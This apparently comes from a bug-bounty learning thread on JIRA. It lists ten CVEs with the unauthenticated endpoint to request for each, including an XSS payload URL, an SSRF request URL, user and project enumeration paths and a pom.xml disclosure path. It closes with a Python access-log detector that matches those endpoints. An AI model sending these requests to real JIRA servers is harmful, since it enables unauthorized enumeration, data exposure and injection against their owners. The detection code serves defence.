#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with various versions of JIRA software that are exploited in the wild, and it is one of my personal favourite third-party apps to hunt.



1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLAs, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message for a valid vs. an invalid project key. Apart from the enumeration, you can often get unauthenticated access to the project if the protections are not in place.

4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

6. CVE-2019-3396 (Path Traversal)

7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]

8. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that user-related information is returned.

9. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when a valid vs. an invalid user is queried.

10. CVE-2019-8442 (Sensitive Information Disclosure)
a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
Tools: Nuclei templates can be used to automate detection of most of these CVEs.
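On the defensive side, the same endpoint list can be turned into access-log detection. The following is an added example, not code from the original thread: it flags requests hitting the endpoints listed above in combined-format web server logs; the CVE-to-path mapping and the sample log lines are constructed for this example.

```python
import re
from collections import defaultdict
# Paths from the list above, keyed by CVE (mapping assumed for this example).
CVE_PATHS = {
    "CVE-2020-14179": "/secure/QueryComponent!Default.jspa",
    "CVE-2020-14181": "/secure/ViewUserHover.jspa",
    "CVE-2019-3402": "/secure/ConfigurePortalPages!default.jspa",
    "CVE-2019-11581": "/secure/ContactAdministrators!default.jspa",
    "CVE-2019-8451": "/plugins/servlet/gadgets/makeRequest",
    "CVE-2019-8449": "/rest/api/latest/groupuserpicker",
    "CVE-2019-3403": "/rest/api/2/user/picker",
}
# CVE-2019-8442 exposes files under /s/<anything>/_/META-INF/, so match a pattern.
META_INF_RE = re.compile(r"^/s/[^/]+/_/META-INF/", re.IGNORECASE)
# Combined log format: ip - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target):
    """Return the CVE whose known endpoint the request target hits, else None."""
    path = target.split("?", 1)[0]
    if META_INF_RE.match(path):
        return "CVE-2019-8442"
    for cve, known in CVE_PATHS.items():
        if path.lower() == known.lower():
            return cve
    return None

def scan_access_log(lines):
    """Group matching requests as {ip: {cve: [(status, target), ...]}}."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LOG_RE.match(line)
        cve = classify_request(m["target"]) if m else None
        if cve:
            hits[m["ip"]][cve].append((int(m["status"]), m["target"]))
    return {ip: dict(cves) for ip, cves in hits.items()}

# Constructed sample log lines (not real traffic) for demonstration.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2021:10:00:01 +0000] "GET /secure/QueryComponent!Default.jspa HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Jan/2021:10:00:02 +0000] "GET /rest/api/2/user/picker?query=admin HTTP/1.1" 200 312',
    '203.0.113.5 - - [10/Jan/2021:10:00:03 +0000] "GET /s/x/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Jan/2021:10:00:04 +0000] "GET /browse/PROJ-1 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, cves in scan_access_log(SAMPLE_LOG).items():
        print(ip, sorted(cves))  # 203.0.113.5 ['CVE-2019-3403', 'CVE-2019-8442', 'CVE-2020-14179']
```

A 200 response on one of these paths from an unauthenticated client is the signal worth alerting on; a single source touching several of them in quick succession is the typical scanner footprint.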
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
- https://t.co/ZMVc80vrYQ
